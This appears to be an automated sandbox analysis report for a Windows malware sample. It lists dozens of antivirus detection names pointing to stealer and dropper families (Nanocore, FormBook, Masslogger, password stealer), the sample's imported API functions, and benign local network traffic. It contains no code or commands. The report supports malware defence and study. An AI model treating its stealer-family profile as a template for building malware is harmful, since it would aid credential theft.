K7GW Riskware ( 0040eff71 )
CrowdStrike win/malicious_confidence_90% (W)
Arcabit Trojan.Generic.D20ADE5D
Cyren W32/Trojan.JHFN-0050
Symantec ML.Attribute.HighConfidence
APEX Malicious
Avast Win32:Malware-gen
ClamAV Win.Dropper.Nanocore-9168858-0
Kaspersky HEUR:Trojan.Win32.Kryptik.gen
BitDefender Trojan.GenericKD.34266717
NANO-Antivirus Trojan.Win32.Kryptik.hprcdn
Paloalto generic.ml
AegisLab Trojan.Win32.Kryptik.4!c
Ad-Aware Trojan.GenericKD.34266717
Emsisoft Trojan.GenericKD.34266717 (B)
Comodo Malware@#funowvuby8c9
F-Secure Trojan.TR/Injector.jawnn
DrWeb Trojan.PWS.Stealer.28996
Zillya Trojan.Injector.Win32.755492
TrendMicro Trojan.Win32.MALREP.THKOABO
McAfee-GW-Edition BehavesLike.Win32.Fareit.tc
Sophos Mal/Generic-S
Jiangmin Trojan.Kryptik.bzn
eGambit Unsafe.AI_Score_86%
Avira TR/Injector.jawnn
Antiy-AVL Trojan/Win32.Kryptik
Kingsoft Win32.Troj.Undef.(kcloud)
Gridinsoft Trojan.Win32.FormBook.oa
Microsoft Trojan:Win32/DataStealer.VD!MTB
ZoneAlarm HEUR:Trojan.Win32.Kryptik.gen
GData Trojan.GenericKD.34266717
Cynet Malicious (score: 100)
AhnLab-V3 Suspicious/Win.Delphiless.X2094
Acronis suspicious
BitDefenderTheta Gen:NN.ZelphiF.34670.uHW@amp55Bci
ALYac Trojan.Agent.Masslogger
MAX malware (ai score=80)
VBA32 TScope.Trojan.Delf
Malwarebytes Trojan.MalPack.DLF
ESET-NOD32 a variant of Win32/Injector.EMVB
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

1992-06-20 06:22:17

Imports

Library kernel32.dll:
0x493178 VirtualFree
0x49317c VirtualAlloc
0x493180 LocalFree
0x493184 LocalAlloc
0x493188 GetVersion
0x49318c GetCurrentThreadId
0x493198 VirtualQuery
0x49319c WideCharToMultiByte
0x4931a0 MultiByteToWideChar
0x4931a4 lstrlenA
0x4931a8 lstrcpynA
0x4931ac LoadLibraryExA
0x4931b0 GetThreadLocale
0x4931b4 GetStartupInfoA
0x4931b8 GetProcAddress
0x4931bc GetModuleHandleA
0x4931c0 GetModuleFileNameA
0x4931c4 GetLocaleInfoA
0x4931c8 GetCommandLineA
0x4931cc FreeLibrary
0x4931d0 FindFirstFileA
0x4931d4 FindClose
0x4931d8 ExitProcess
0x4931dc WriteFile
0x4931e4 RtlUnwind
0x4931e8 RaiseException
0x4931ec GetStdHandle
Library user32.dll:
0x4931f4 GetKeyboardType
0x4931f8 LoadStringA
0x4931fc MessageBoxA
0x493200 CharNextA
Library advapi32.dll:
0x493208 RegQueryValueExA
0x49320c RegOpenKeyExA
0x493210 RegCloseKey
Library oleaut32.dll:
0x493218 SysFreeString
0x49321c SysReAllocStringLen
0x493220 SysAllocStringLen
Library kernel32.dll:
0x493228 TlsSetValue
0x49322c TlsGetValue
0x493230 LocalAlloc
0x493234 GetModuleHandleA
Library advapi32.dll:
0x49323c RegQueryValueExA
0x493240 RegOpenKeyExA
0x493244 RegCloseKey
Library kernel32.dll:
0x49324c lstrcpyA
0x493250 WriteFile
0x493254 WaitForSingleObject
0x493258 VirtualQuery
0x49325c VirtualAlloc
0x493260 Sleep
0x493264 SizeofResource
0x493268 SetThreadLocale
0x49326c SetFilePointer
0x493270 SetEvent
0x493274 SetErrorMode
0x493278 SetEndOfFile
0x49327c ResetEvent
0x493280 ReadFile
0x493284 MultiByteToWideChar
0x493288 MulDiv
0x49328c LockResource
0x493290 LoadResource
0x493294 LoadLibraryA
0x4932a0 GlobalUnlock
0x4932a4 GlobalSize
0x4932a8 GlobalReAlloc
0x4932ac GlobalHandle
0x4932b0 GlobalLock
0x4932b4 GlobalFree
0x4932b8 GlobalFindAtomA
0x4932bc GlobalDeleteAtom
0x4932c0 GlobalAlloc
0x4932c4 GlobalAddAtomA
0x4932c8 GetVersionExA
0x4932cc GetVersion
0x4932d0 GetUserDefaultLCID
0x4932d4 GetTickCount
0x4932d8 GetThreadLocale
0x4932dc GetSystemInfo
0x4932e0 GetStringTypeExA
0x4932e4 GetStdHandle
0x4932e8 GetProcAddress
0x4932ec GetModuleHandleA
0x4932f0 GetModuleFileNameA
0x4932f4 GetLocaleInfoA
0x4932f8 GetLocalTime
0x4932fc GetLastError
0x493300 GetFullPathNameA
0x493304 GetDiskFreeSpaceA
0x493308 GetDateFormatA
0x49330c GetCurrentThreadId
0x493310 GetCurrentProcessId
0x493314 GetComputerNameA
0x493318 GetCPInfo
0x49331c GetACP
0x493320 FreeResource
0x493324 InterlockedExchange
0x493328 FreeLibrary
0x49332c FormatMessageA
0x493330 FindResourceA
0x493334 EnumCalendarInfoA
0x493340 CreateThread
0x493344 CreateFileA
0x493348 CreateEventA
0x49334c CompareStringA
0x493350 CloseHandle
Library version.dll:
0x493358 VerQueryValueA
0x493360 GetFileVersionInfoA
Library gdi32.dll:
0x493368 UnrealizeObject
0x49336c StretchBlt
0x493370 SetWindowOrgEx
0x493374 SetWinMetaFileBits
0x493378 SetViewportOrgEx
0x49337c SetTextColor
0x493380 SetStretchBltMode
0x493384 SetROP2
0x493388 SetPixel
0x49338c SetMapMode
0x493390 SetEnhMetaFileBits
0x493394 SetDIBColorTable
0x493398 SetBrushOrgEx
0x49339c SetBkMode
0x4933a0 SetBkColor
0x4933a4 SelectPalette
0x4933a8 SelectObject
0x4933ac SelectClipRgn
0x4933b0 SaveDC
0x4933b4 RestoreDC
0x4933b8 Rectangle
0x4933bc RectVisible
0x4933c0 RealizePalette
0x4933c4 Polyline
0x4933c8 PlayEnhMetaFile
0x4933cc PatBlt
0x4933d0 MoveToEx
0x4933d4 MaskBlt
0x4933d8 LineTo
0x4933dc LPtoDP
0x4933e0 IntersectClipRect
0x4933e4 GetWindowOrgEx
0x4933e8 GetWinMetaFileBits
0x4933ec GetTextMetricsA
0x4933f8 GetStockObject
0x4933fc GetPixel
0x493400 GetPaletteEntries
0x493404 GetObjectA
0x493414 GetEnhMetaFileBits
0x493418 GetDeviceCaps
0x49341c GetDIBits
0x493420 GetDIBColorTable
0x493424 GetDCOrgEx
0x49342c GetClipRgn
0x493430 GetClipBox
0x493434 GetBrushOrgEx
0x493438 GetBitmapBits
0x49343c ExtTextOutA
0x493440 ExcludeClipRect
0x493444 DeleteObject
0x493448 DeleteEnhMetaFile
0x49344c DeleteDC
0x493450 CreateSolidBrush
0x493454 CreateRectRgn
0x493458 CreatePenIndirect
0x49345c CreatePen
0x493460 CreatePalette
0x493468 CreateFontIndirectA
0x49346c CreateEnhMetaFileA
0x493470 CreateDIBitmap
0x493474 CreateDIBSection
0x493478 CreateCompatibleDC
0x493480 CreateBrushIndirect
0x493484 CreateBitmap
0x493488 CopyEnhMetaFileA
0x49348c CloseEnhMetaFile
0x493490 BitBlt
Library opengl32.dll:
0x493498 wglDeleteContext
Library user32.dll:
0x4934a0 CreateWindowExA
0x4934a4 WindowFromPoint
0x4934a8 WinHelpA
0x4934ac WaitMessage
0x4934b0 ValidateRect
0x4934b4 UpdateWindow
0x4934b8 UnregisterClassA
0x4934bc UnhookWindowsHookEx
0x4934c0 TranslateMessage
0x4934c8 TrackPopupMenu
0x4934d0 ShowWindow
0x4934d4 ShowScrollBar
0x4934d8 ShowOwnedPopups
0x4934dc ShowCursor
0x4934e0 SetWindowsHookExA
0x4934e4 SetWindowTextA
0x4934e8 SetWindowPos
0x4934ec SetWindowPlacement
0x4934f0 SetWindowLongA
0x4934f4 SetTimer
0x4934f8 SetScrollRange
0x4934fc SetScrollPos
0x493500 SetScrollInfo
0x493504 SetRect
0x493508 SetPropA
0x49350c SetParent
0x493510 SetMenuItemInfoA
0x493514 SetMenu
0x493518 SetForegroundWindow
0x49351c SetFocus
0x493520 SetCursor
0x493524 SetClassLongA
0x493528 SetCapture
0x49352c SetActiveWindow
0x493530 SendMessageA
0x493534 ScrollWindow
0x493538 ScreenToClient
0x49353c RemovePropA
0x493540 RemoveMenu
0x493544 ReleaseDC
0x493548 ReleaseCapture
0x493554 RegisterClassA
0x493558 RedrawWindow
0x49355c PtInRect
0x493560 PostQuitMessage
0x493564 PostMessageA
0x493568 PeekMessageA
0x49356c OffsetRect
0x493570 OemToCharA
0x493574 MessageBoxA
0x493578 MapWindowPoints
0x49357c MapVirtualKeyA
0x493580 LoadStringA
0x493584 LoadKeyboardLayoutA
0x493588 LoadIconA
0x49358c LoadCursorA
0x493590 LoadBitmapA
0x493594 KillTimer
0x493598 IsZoomed
0x49359c IsWindowVisible
0x4935a0 IsWindowEnabled
0x4935a4 IsWindow
0x4935a8 IsRectEmpty
0x4935ac IsIconic
0x4935b0 IsDialogMessageA
0x4935b4 IsChild
0x4935b8 InvalidateRect
0x4935bc IntersectRect
0x4935c0 InsertMenuItemA
0x4935c4 InsertMenuA
0x4935c8 InflateRect
0x4935d0 GetWindowTextA
0x4935d4 GetWindowRect
0x4935d8 GetWindowPlacement
0x4935dc GetWindowLongA
0x4935e0 GetWindowDC
0x4935e4 GetTopWindow
0x4935e8 GetSystemMetrics
0x4935ec GetSystemMenu
0x4935f0 GetSysColorBrush
0x4935f4 GetSysColor
0x4935f8 GetSubMenu
0x4935fc GetScrollRange
0x493600 GetScrollPos
0x493604 GetScrollInfo
0x493608 GetPropA
0x49360c GetParent
0x493610 GetWindow
0x493614 GetMessageTime
0x493618 GetMenuStringA
0x49361c GetMenuState
0x493620 GetMenuItemInfoA
0x493624 GetMenuItemID
0x493628 GetMenuItemCount
0x49362c GetMenu
0x493630 GetLastActivePopup
0x493634 GetKeyboardState
0x49363c GetKeyboardLayout
0x493640 GetKeyState
0x493644 GetKeyNameTextA
0x493648 GetIconInfo
0x49364c GetForegroundWindow
0x493650 GetFocus
0x493654 GetDlgItem
0x493658 GetDesktopWindow
0x49365c GetDCEx
0x493660 GetDC
0x493664 GetCursorPos
0x493668 GetCursor
0x49366c GetClipboardData
0x493670 GetClientRect
0x493674 GetClassNameA
0x493678 GetClassInfoA
0x49367c GetCapture
0x493680 GetActiveWindow
0x493684 FrameRect
0x493688 FindWindowA
0x49368c FillRect
0x493690 EqualRect
0x493694 EnumWindows
0x493698 EnumThreadWindows
0x49369c EndPaint
0x4936a0 EnableWindow
0x4936a4 EnableScrollBar
0x4936a8 EnableMenuItem
0x4936ac DrawTextA
0x4936b0 DrawMenuBar
0x4936b4 DrawIconEx
0x4936b8 DrawIcon
0x4936bc DrawFrameControl
0x4936c0 DrawFocusRect
0x4936c4 DrawEdge
0x4936c8 DispatchMessageA
0x4936cc DestroyWindow
0x4936d0 DestroyMenu
0x4936d4 DestroyIcon
0x4936d8 DestroyCursor
0x4936dc DeleteMenu
0x4936e0 DefWindowProcA
0x4936e4 DefMDIChildProcA
0x4936e8 DefFrameProcA
0x4936ec CreatePopupMenu
0x4936f0 CreateMenu
0x4936f4 CreateIcon
0x4936f8 ClientToScreen
0x4936fc CheckMenuItem
0x493700 CallWindowProcA
0x493704 CallNextHookEx
0x493708 BeginPaint
0x49370c CharNextA
0x493710 CharLowerBuffA
0x493714 CharLowerA
0x493718 CharUpperBuffA
0x49371c CharToOemA
0x493720 AdjustWindowRectEx
Library kernel32.dll:
0x49372c Sleep
Library oleaut32.dll:
0x493734 SafeArrayPtrOfIndex
0x493738 SafeArrayPutElement
0x49373c SafeArrayGetElement
0x493744 SafeArrayAccessData
0x493748 SafeArrayGetUBound
0x49374c SafeArrayGetLBound
0x493750 SafeArrayCreate
0x493754 VariantChangeType
0x493758 VariantCopyInd
0x49375c VariantCopy
0x493760 VariantClear
0x493764 VariantInit
Library ole32.dll:
0x493770 IsAccelerator
0x493774 OleDraw
0x49377c CoTaskMemFree
0x493780 ProgIDFromCLSID
0x493784 StringFromCLSID
0x493788 CoCreateInstance
0x49378c CoGetClassObject
0x493790 CoUninitialize
0x493794 CoInitialize
0x493798 IsEqualGUID
Library oleaut32.dll:
0x4937a0 GetErrorInfo
0x4937a4 GetActiveObject
0x4937a8 SysFreeString
Library comctl32.dll:
0x4937b8 ImageList_Write
0x4937bc ImageList_Read
0x4937cc ImageList_DragMove
0x4937d0 ImageList_DragLeave
0x4937d4 ImageList_DragEnter
0x4937d8 ImageList_EndDrag
0x4937dc ImageList_BeginDrag
0x4937e0 ImageList_Remove
0x4937e4 ImageList_DrawEx
0x4937e8 ImageList_Replace
0x4937ec ImageList_Draw
0x4937fc ImageList_Add
0x493804 ImageList_Destroy
0x493808 ImageList_Create
0x49380c InitCommonControls
Library comdlg32.dll:
0x493814 GetOpenFileNameA

Hosts

No hosts contacted.

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51808 114.114.114.114 53
192.168.56.101 53657 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 60123 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 63429 224.0.0.252 5355
192.168.56.101 65004 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 53658 239.255.255.250 3702
192.168.56.101 58707 239.255.255.250 3702
192.168.56.101 60124 239.255.255.250 3702
192.168.56.101 62194 239.255.255.250 1900

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.